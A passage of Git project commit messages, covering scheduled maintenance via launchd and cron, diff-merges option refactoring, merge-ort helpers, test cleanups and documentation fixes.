<string>maintenance</string>
<string>run</string>
<string>--schedule=weekly</string>
</array>
<key>StartCalendarInterval</key>
<array>
<dict>
<key>Day</key><integer>0</integer>
<key>Hour</key><integer>0</integer>
<key>Minute</key><integer>0</integer>
</dict>
</array>
</dict>
</plist>
The schedules for the daily and hourly tasks are more complicated
since we need to use an array for the StartCalendarInterval with
an entry for each of the six days other than the 0th day (to avoid
colliding with the weekly task), and each of the 23 hours other
than the 0th hour (to avoid colliding with the daily task).
The "Label" value is currently filled with "org.git-scm.git.X"
where X is the frequency. We need a different plist file for each
frequency.
The launchctl command needs to be aligned with a user id in order
to initialize the command environment. This must be done using
the 'launchctl bootstrap' subcommand. This subcommand is new as
of macOS 10.11, which was released in September 2015. Before that
release the 'launchctl load' subcommand was recommended. The best
source of information on this transition I have seen is available
at [2]. The current design does not preclude a future version that
detects the available fatures of 'launchctl' to use the older
commands. However, it is best to rely on the newest version since
Apple might completely remove the deprecated version on short
notice.
[2] https://babodee.wordpress.com/2016/04/09/launchctl-2-0-syntax/
To remove a schedule, we must run 'launchctl bootout' with a valid
plist file. We also need to 'bootout' a task before the 'bootstrap'
subcommand will succeed, if such a task already exists.
The need for a user id requires us to run 'id -u' which works on
POSIX systems but not Windows. Further, the need for fully-qualitifed
path names including $HOME behaves differently in the Git internals and
the external test suite. The $HOME variable starts with "C:\..." instead
of the "/c/..." that is provided by Git in these subcommands. The test
therefore has a prerequisite that we are not on Windows. The cross-
platform logic still allows us to test the macOS logic on a Linux
machine.
We can verify the commands that were run by 'git maintenance start'
and 'git maintenance stop' by injecting a script that writes the
command-line arguments into GIT_TEST_MAINT_SCHEDULER.
An earlier version of this patch accidentally had an opening
"<dict>" tag when it should have had a closing "</dict>" tag. This
was caught during manual testing with actual 'launchctl' commands,
but we do not want to update developers' tasks when running tests.
It appears that macOS includes the "xmllint" tool which can verify
the XML format. This is useful for any system that might contain
the tool, so use it whenever it is available.
We strive to make these tests work on all platforms, but Windows caused
some headaches. In particular, the value of getuid() called by the C
code is not guaranteed to be the same as `$(id -u)` invoked by a test.
This is because `git.exe` is a native Windows program, whereas the
utility programs run by the test script mostly utilize the MSYS2 runtime,
which emulates a POSIX-like environment. Since the purpose of the test
is to check that the input to the hook is well-formed, the actual user
ID is immaterial, thus we can work around the problem by making the the
test UID-agnostic. Another subtle issue is the $HOME environment
variable being a Windows-style path instead of a Unix-style path. We can
be more flexible here instead of expecting exact path matches.
Helped-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Co-authored-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When __git_complete was introduced, it was meant to be temporarily, while
a proper guideline for public shell functions was established
(tentatively _GIT_complete), but since that never happened, people
in the wild started to use __git_complete, even though it was marked as
not public.
Eight years is more than enough wait, let's mark this function as
public, and make it a bit more user-friendly.
So that instead of doing:
__git_complete gk __gitk_main
The user can do:
__git_complete gk gitk
And instead of:
__git_complete gf _git_fetch
Do:
__git_complete gf git_fetch
Backwards compatibility is maintained.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Even though the function was marked as not public, it's already used in
the wild.
We should at least test basic functionality.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
1. We should quote the argument
2. We don't need two redirections
3. A safeguard for arguments (-a) would be good
Suggested-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This makes the code more readable, and also will help when new code
wants to do similar checks.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If the user specifies a base commit to switch to, check if it actually
references a commit right away to avoid getting confused later on when
it turns out to be an invalid object.
Reported-by: LeSeulArtichaut <leseulartichaut@gmail.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This matches a trace_performance_enter()/trace_performance_leave() pair
added by 0d1ed59 (unpack-trees: add performance tracing, 2018-08-18).
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The unpack_trees() method is quite complicated and its performance can
change dramatically depending on how it is used. We already have some
performance tracing regions, but they have not been updated to the
trace2 API. Do so now.
We already have trace2 regions in unpack_trees.c:clear_ce_flags(), which
uses a linear scan through the index without recursing into trees.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The traverse_trees() method recursively walks through trees, but also
prunes the tree-walk based on a callback. Some callers, such as
unpack_trees(), are quite complicated and can have wildly different
performance between two different commands.
Create constants that count these values and then report the results at
the end of a process. These counts are cumulative across multiple "root"
instances of traverse_trees(), but they provide reproducible values for
demonstrating improvements to the pruning algorithm when possible.
This change is modeled after a similar statistics reporting in 42e50e78
(revision.c: add trace2 stats around Bloom filter usage, 2020-04-06).
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We trace statistics about the effectiveness of changed-path Bloom
filters since 42e50e78 (revision.c: add trace2 stats around Bloom
filter usage, 2020-04-06). Add similar tracing for the topo-walk
algorithm that uses generation numbers to limit the walk size.
This information can help investigate and describe benefits to
heuristics and other changes.
The information that is printed is in JSON format and can be formatted
nicely to present as follows:
{
"count_explort_walked":2603,
"count_indegree_walked":2603,
"count_topo_walked":473
}
Each of these values count the number of commits are visited by each of
the three "stages" of the topo-walk as detailed in b4542418 (revision.c:
generation-based topo-order algorithm, 2018-11-01).
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change all remnants of "sha1" in hash-lookup.c and .h and rename them to
reflect that we're not just able to handle SHA-1 these days.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename this function to reflect that we're not just able to handle SHA-1
these days. There are a few instances of "sha1" left in sha1-lookup.[ch]
after this, but those will be addressed in the next commit.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Drop the last remnant of "sha1" in this file and rename it to reflect
that we're not just able to handle SHA-1 these days.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Generalize the last remnants of "sha" and "sha1" in this file and rename
it to reflect that we're not just able to handle SHA-1 these days.
We need to update one test to check for an updated error string.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We document the delta data as a set of instructions, but forget to
document the two sizes that precede those instructions: the size of the
base object and the size of the object to be reconstructed. Fix this
omission.
Rather than cramming all the details about the encoding into the running
text, introduce a separate section detailing our "size encoding" and
refer to it.
Reported-by: Ross Light <ross@zombiezen.com>
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 25d5ea410f ("[PATCH] Redo rename/copy detection logic.",
2005-05-24) added a duplicate entry check on rename_src in order to
avoid segfaults; the code at the time was prone to double free()s and an
easy way to avoid it was just to turn off rename detection for any
duplicate entries. Note that the form of the check was modified two
commits ago in this series.
Similarly, commit 4d6be03b95 ("diffcore-rename: avoid processing
duplicate destinations", 2015-02-26) added a duplicate entry check
on rename_dst for the exact same reason -- the code was prone to double
free()s, and an easy way to avoid it was just to turn off rename
detection entirely. Note that the form of the check was modified in the
commit just before this one.
In the original code in both places, the code was dealing with
individual diff_filespecs and trying to match things up, instead of just
keeping the original diff_filepairs around as we do now. The
intervening change in structure has fixed the accounting problems and
the associated double free()s that used to occur, and thus we already
have a better fix. As such, we can remove the band-aid checks for
duplicate entries.
Due to the last two patches, the diffcore_rename() setup is no longer a
sizeable chunk of overall runtime. Thus, in a large rebase of many
commits with lots of renames and several optimizations to inexact rename
detection, this patch only speeds up the overall code by about half a
percent or so and is pretty close to the run-to-run variability making
it hard to get an exact measurement. However, with some trace2 regions
around the setup code in diffcore_rename() so that I can focus on just
it, I measure that this patch consistently saves almost a third of the
remaining time spent in diffcore_rename() setup.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t6016 manually reconstructs git log --graph output by using the reported
commit hashes from `git rev-parse`. Each tag is converted into an
environment variable manually, and then `echo`-ed to an expected output
file, which is in turn compared to the actual output.
The expected output is difficult to read and write, because, e.g.,
each line of output must be prefaced with echo, quoted, and properly
escaped. Additionally, the test is sensitive to trailing whitespace,
which may potentially be removed from graph log output in the future.
In order to reduce duplication, ease troubleshooting of failed tests by
improving readability, and ease the addition of more tests to this file,
port the operations to `lib-log-graph.sh`, which is already used in
several other tests, e.g., t4215. Give all merges a simple commit
message, and use a common `check_graph` macro taking a heredoc of the
expected output which does not required extensive escaping.
Signed-off-by: Antonio Russo <aerusso@aerusso.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We use various made-up config keys in the "core" section for no real
reason. Change them to work in the "section" section instead and be
careful to also change "cores" to "sections". Make sure to also catch
"Core", "CoReS" and similar.
There are a few instances that actually want to work with a real "core"
config such as `core.bare` or `core.editor`. After this, it's clearer
that they work with "core" for a reason.
Reported-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We test that we can handle `git config --file symlink` and the error
case of `git config --file symlink-to-missing-file`. For good measure,
we also throw in a test to check that we correctly handle referencing a
missing regular file. But we have such a test earlier in this script.
They both check that we fail to use `--file no-such-file --list`.
Drop the latter of these and keep the one that is in the general area
where we test `--file` and `GIT_CONFIG`. The one we're dropping also
checks that we can't even get a specific key from the missing file --
let's make sure we check that in the test we keep.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have two tests for checking that we can handle `git config --file
../other-config ...`. One, using `--file`, was introduced in 65807ee697
("builtin-config: Fix crash when using "-f <relative path>" from
non-root dir", 2010-01-26), then another, using `GIT_CONFIG`, came about
in 270a34438b ("config: stop using config_exclusive_filename",
2012-02-16).
The latter of these was then converted to use `--file` in f7e8714101
("t: prefer "git config --file" to GIT_CONFIG", 2014-03-20). Both where
then simplified in a5db0b77b9 ("t1300: extract and use
test_cmp_config()", 2018-10-21).
These two tests differ slightly in the order of the options used, but
other than that, they are identical. Let's drop one. As noted in
f7e8714101, we do still have a test for `GIT_CONFIG` and it shares the
implementation with `--file`.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'gitmodules.txt' is a guide about the '.gitmodules' file that describes
submodule properties, and that file must exist at the root of the
repository. This was clarified in e5b5c1d2cf (Document clarification:
gitmodules, gitattributes, 2008-08-31).
However, that commit mistakenly uses the non-existing environment
variable 'GIT_WORK_DIR' to refer to the root of the repository.
Fix that by using the correct variable, 'GIT_WORK_TREE'. Take the
opportunity to modernize and improve the formatting of that guide,
and fix a grammar mistake.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Acked-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add some handling that explicitly considers collisions of the following
types:
* file/submodule
* file/symlink
* submodule/symlink
Leaving them as conflicts at the same path are hard for users to
resolve, so move one or both of them aside so that they each get their
own path.
Note that in the case of recursive handling (i.e. call_depth > 0), we
can just use the merge base of the two merge bases as the merge result
much like we do with modify/delete conflicts, binary files, conflicting
submodule values, and so on.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Code is identical for the function body in the two files, the call
signature is just slightly different in merge-ort than merge-recursive
as noted a couple commits ago.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This implementation is based on a mixture of print_commit() and
output_commit_title() from merge-recursive.c so that it can be used to
take over both functions.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Take merge_submodule() from merge-recursive.c and make slight
adjustments, predominantly around deferring output using path_msg()
instead of using merge-recursive's output() and show() functions.
There's also a fix for recursive cases (when call_depth > 0) and a
slight change to argument order for find_first_merges().
find_first_merges() and format_commit() are left unimplemented for
now, but will be added by subsequent commits.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Take merge_3way() from merge-recursive.c and make slight adjustments
based on different data structures (direct usage of object_id
rather diff_filespec, separate pathnames which based on our careful
interning of pathnames in opt->priv->paths can be compared with '!='
rather than 'strcmp').
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This implementation is based heavily on merge_mode_and_contents() from
merge-recursive.c, though it has some fixes for recursive merges (i.e.
when call_depth > 0), and has a number of changes throughout based on
slight differences in data structures and in how the functions are
called.
It is, however, based on two new helper functions -- merge_3way() and
merge_submodule -- for which we only provide die-not-implemented stubs
at this point. Future commits will add implementations of these
functions.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In addition to the content merge (which will go in a subsequent commit),
we need to worry about conflict messages, placing results in higher
order stages in case of a df_conflict, and making sure the results are
placed in ci->merged.result so that they will show up in the working
tree. Take care of all that external book-keeping, moving the
simplistic just-take-HEAD code into the barebones handle_content_merge()
function for now. Subsequent commits will flesh out
handle_content_merge().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement unique_path(), based on the one from merge-recursive.c. It is
simplified, however, due to: (1) using strmaps, and (2) the fact that
merge-ort lets the checkout codepath handle possible collisions with the
working tree means that other code locations don't have to.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a directory/file conflict remains, we can leave the directory where
it is, but need to move the information about the file to a different
pathname. After moving the file to a different pathname, we allow
subsequent process_entry() logic to handle any additional details that
might be relevant.
This depends on a new helper function, unique_path(), that dies with an
unimplemented error currently but will be implemented in a subsequent
commit.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When one side has a directory at a given path and the other side of
history has a file at the path, but the merge resolves the directory
away (e.g. because no path within that directory was modified and the
other side deleted it, or because renaming moved all the files
elsewhere), then we don't actually have a conflict anymore. We just
need to clear away any information related to the relevant directory,
and then the subsequent process_entry() handling can handle the given
path.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We'll keep this document mostly in sync with the upstream; let's
help "git am" and "git show" by telling them that they may introduce
what we may consider whitespace errors.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Hotfix for a topic of this cycle.
* ma/maintenance-crontab-fix:
t7900-maintenance: test for magic markers
gc: fix handling of crontab magic markers
git-maintenance.txt: add missing word
Test coverage fix.
* js/no-more-prepare-for-main-in-test:
tests: drop the `PREPARE_FOR_MAIN_BRANCH` prereq
t9902: use `main` as initial branch name
t6302: use `main` as initial branch name
t5703: use `main` as initial branch name
t5510: use `main` as initial branch name
t5505: finalize transitioning to using the branch name `main`
t3205: finalize transitioning to using the branch name `main`
t3203: complete the transition to using the branch name `main`
t3201: finalize transitioning to using the branch name `main`
t3200: finish transitioning to the initial branch name `main`
t1400: use `main` as initial branch name
"git pack-redandant" when there is only one packfile used to crash,
which has been corrected.
* jx/pack-redundant-on-single-pack:
pack-redundant: fix crash when one packfile in repo
Example of pattern file type: text+k
Text filtered through the p4 pattern regexp must be converted from
string back to bytes, otherwise 'data' command for the fast-import
will receive extra invalid characters, followed by the fast-import
process error.
CC: Yang Zhao <yang.zhao@skyboxlabs.com>
Signed-off-by: Daniel Levin <dendy.ua@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This allows users to write hash-agnostic scripts and configs by
disabling abbreviations. Using "-c core.abbrev=40" will be
insufficient with SHA-256, and "-c core.abbrev=64" won't work with
SHA-1 repos today.
Signed-off-by: Eric Wong <e@80x24.org>
[jc: tweaked implementation, added doc and a test]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Amend the wording of documentation added in 6cfec03680 (mktag:
minimally update the description., 2007-06-10). It makes more sense to
say "when it exists" here, as we're referring to "the message".
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the "mktag" documentation to refer to the input hash as just
"hash", not "sha1". This command has supported SHA-256 for a while
now.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
test_export() has been self-recursive since its inception even though a
simple for-loop would have served just as well to append its arguments
to the `test_export_` variable separated by the pipe character "|".
Recently `test_export_` was changed instead to a space-separated list of
tokens to be exported, an operation which can be accomplished via a
single simple assignment, with no need for looping or recursion.
Therefore, simplify the implementation.
While at it, take advantage of the fact that variable names to be
exported are shell identifiers, thus won't be composed of special
characters or whitespace, thus simple a `$*` can be used rather than
magical `"$@"`.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'linkgit' Asciidoc macro is misspelled as 'linkit' in the
description of 'GIT_SEQUENCE_EDITOR' since the addition of that variable
to git(1) in 902a126eca (doc: mention GIT_SEQUENCE_EDITOR and
'sequence.editor' more, 2020-08-31). Also, it uses two colons instead of
one.
Fix that.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Comment did not adequately explain how the two loops work
together to achieve the goal of querying for matching of any
negative refspec.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The logic added to check for negative pathspec match by c0192df630
(refspec: add support for negative refspecs, 2020-09-30) looks at
refspec->src assuming it is never NULL, however when
remote.origin.push is set to ":", then refspec->src is NULL,
causing a segfault within strcmp.
Tell git to handle matching refspec by adding the needle to the
set of positively matched refspecs, since matching ":" refspecs
match anything as src.
Add test for matching refspec pushes fetch-negative-refspec
both individually and in combination with a negative refspec.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we insert our "BEGIN" and "END" markers into the cron table, it's
so that a Git version from many years into the future would be able to
identify this region in the cron table. Let's add a test to make sure
that these markers don't ever change.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On `git maintenance start`, we add a few entries to the user's cron
table. We wrap our entries using two magic markers, "# BEGIN GIT
MAINTENANCE SCHEDULE" and "# END GIT MAINTENANCE SCHEDULE". At a later
`git maintenance stop`, we will go through the table and remove these
lines. Or rather, we will remove the "BEGIN" marker, the "END" marker
and everything between them.
Alas, we have a bug in how we detect the "END" marker: we don't. As we
loop through all the lines of the crontab, if we are in the "old
region", i.e., the region we're aiming to remove, we make an early
`continue` and don't get as far as checking for the "END" marker. Thus,
once we've seen our "BEGIN", we remove everything until the end of the
file.
Rewrite the logic for identifying these markers. There are four cases
that are mutually exclusive: The current line starts a region or it ends
it, or it's firmly within the region, or it's outside of it (and should
be printed).
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This fixes a segmentation fault.
The bug is caused by dereferencing `new_branch_info->commit` when it is
`NULL`, which is the case when the tree-ish argument is actually a tree,
not a commit-ish. This was introduced in 5602b500c3 (builtin/checkout:
fix `git checkout -p HEAD...` bug, 2020-10-07), where we tried to ensure
that the special tree-ish `HEAD...` is handled correctly.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This new option provides essential new functionality, changing diff
output to first parent only, without changing history traversal mode,
so it deserves its own test.
As we do it, add additional test that --diff-merges=first-parent by
itself doesn't imply -p and only outputs diffs for merge commits.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move description of --diff-merges option from git-log.txt to
diff-options.txt so that it is included in the git-show help.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After introduction of the --diff-merges=first-parent, the
--first-parent sets the default format for merges to the same value as
this new option. Document this behavior and add corresponding
reference to --diff-merges.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Mention --diff-merges instead of -m in a note to merge formats to aid
discoverability, as -m is now described among --diff-merges options
anyway.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Describe all the new --diff-merges options in the git-log.txt and
adopt description of originals accordingly.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we now have --diff-merges={m|c|cc}, add --diff-merges=1 as synonym
for --diff-merges=first-parent, to have shorter mnemonics for it as
well.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This adds --diff-merges={m|c|cc} values that match mnemonics of old
options, for those who are used to them.
Note that, say, --diff-meres=cc behaves differently than --cc, as the
latter implies -p and therefore enables diffs for all the commits,
while the former enables output of diffs for merge commits only.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
New options don't have any visible effect unless -p is either given or
implied, as unlike -c/-cc we don't imply -p with --diff-merges. To fix
this, this patch adds new functionality by letting new options enable
output of diffs for merge commits only.
Add 'merges_need_diff' field and set it whenever diff output for merges is
enabled by any of the new options.
Extend diff output logic accordingly, to output diffs for merges when
'merges_need_diff' is set even when no -p has been provided.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add 'combined_imply_patch' field and set it only for old --cc/-c
options, then imply -p if this flag is set instead of implying -p
whenever 'combined_merge' flag is set.
We don't want new --diff-merge options to imply -p, to make it
possible to enable output of diffs for merges independently from
non-merge commits. At the same time we want to preserve behavior of
old --c/-c/-m options and their interactions with --first-parent, to
stay backward-compatible.
This patch is first step in this direction: it separates old "--cc/-c
imply -p" logic from the rest of the options.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We first implement new options as exact synonyms for their original
counterparts, to get all the infrastructure right, and keep functional
improvements for later commits.
The following values are implemented:
--diff-merges= old equivalent
first|first-parent = --first-parent (only format implications)
sep|separate = -m
comb|combined = -c
dense| dense-combined = --cc
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
-c/--cc got precedence over -m only because of external logic where
corresponding flags are checked before that for -m. This is too
error-prone, so add code that explicitly makes these 3 options
mutually exclusive, so that the last option specified on the
command-line gets precedence.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To prepare introduction of new options some of which will be synonyms
to existing options, let every option handling code just call
corresponding function.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After getting rid of 'ignore_merges' field, the diff_merges_init_revs()
function became empty. Get rid of it.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The relevant flags were somewhat scattered over definition of 'struct
rev_info'. Rearrange them to group them together.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'ignore_merges' was 3-way field that served two distinct purposes that
we now assign to 2 new independent flags: 'separate_merges', and
'explicit_diff_merges'.
'separate_merges' tells that we need to output diff format containing
separate diff for every parent (as opposed to 'combine_merges').
'explicit_diff_merges' tells that at least one of diff-merges options
has been explicitly specified on the command line, so no defaults
should apply.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Logically, -m, -c, --cc specify 3 different formats for representing
merge commits, yet -m doesn't in fact override -c or --cc, that makes
no sense.
Fix -m to properly override -c/--cc, and change the tests accordingly.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Logically, -m, -c, --cc specify 3 different formats for representing
merge commits, yet -m doesn't in fact override -c or --cc, that makes
no sense.
Add 2 expected to fail tests that demonstrate the problem.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add support to be able to specify expected failure, through :failure
magic, like this:
:failure cmd args
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Do not set revs->diff when we encounter an option that needs it, as
it'd be impossible to undo later. Besides, some other options than
what we handle here set this flag as well, and we'd interfere with
them trying to clear this flag later.
Rather set revs->diff, if finally needed, in diff_merges_setup_revs().
As an additional bonus, this also makes our code shorter.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move logic that handles implying -p on -c/--cc from
log_setup_revisions_tweak() to diff_merges_setup_revs(), where it
belongs.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This new field allows us to separate format of diff for merges from
'first_parent_only' flag which primary purpose is limiting history
traversal.
This change further localizes diff format selection logic into the
diff-merges.c file.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call it where given functionality is needed instead of direct
checking/tweaking of diff merges related fields.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function sets all the relevant flags to disabled state, so that
no code that checks only one of them get it wrong.
Then we call this new function everywhere where diff merges output
suppression is needed.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For clarity, define public functions in the order they are called, to
make logic inter-dependencies easier to grok.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename diff_merges_default_to_enable() to
diff_merges_default_to_first_parent() to match its semantics.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The checks for first_parent_only don't in fact belong to this module,
as the primary purpose of this flag is history traversal limiting, so
get it out of this module and rename the
diff_merges_first_parent_defaults_to_enable()
to
diff_merges_default_to_enable()
to match new semantics.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use the same "diff_merges" prefix for all the diff merges function
names.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Create separate diff-merges.c and diff-merges.h files, and move all
the code related to handling of diff merges there.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use these implementations from show_setup_revisions_tweak() and
log_setup_revisions_tweak() in builtin/log.c.
This completes moving of management of diff merges parameters to a
single place, where we can finally observe them simultaneously.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move initialization code related to diffing merges into new
init_diff_merge_revs() function.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move all the setting code related to diffing merges into new
setup_diff_merge_revs() function.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move all the parsing code related to diffing merges into new
parse_diff_merge_opts() function.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git worktree repair` knows how to repair the two-way links between the
repository and a worktree as long as a link in one or the other
direction is sound. For instance, if a linked worktree is moved (without
using `git worktree move`), repair is possible because the worktree
still knows the location of the repository even though the repository no
longer knows where the worktree is. Similarly, if the repository is
moved, repair is possible since the repository still knows the locations
of the worktrees even though the worktrees no longer know where the
repository is.
However, if both the repository and the worktrees are moved, then links
are severed in both directions, and no repair is possible. This is the
case even when the new worktree locations are specified as arguments to
`git worktree repair`. The reason for this limitation is twofold. First,
when `repair` consults the worktree's gitfile (/path/to/worktree/.git)
to determine the corresponding <repo>/worktrees/<id>/gitdir file to fix,
<repo> is the old path to the repository, thus it is unable to fix the
`gitdir` file at its new location since it doesn't know where it is.
Second, when `repair` consults <repo>/worktrees/<id>/gitdir to find the
location of the worktree's gitfile (/path/to/worktree/.git), the path
recorded in `gitdir` is the old location of the worktree's gitfile, thus
it is unable to repair the gitfile since it doesn't know where it is.
Fix these shortcomings by teaching `repair` to attempt to infer the new
location of the <repo>/worktrees/<id>/gitdir file when the location
recorded in the worktree's gitfile has become stale but the file is
otherwise well-formed. The inference is intentionally simple-minded.
For each worktree path specified as an argument, `git worktree repair`
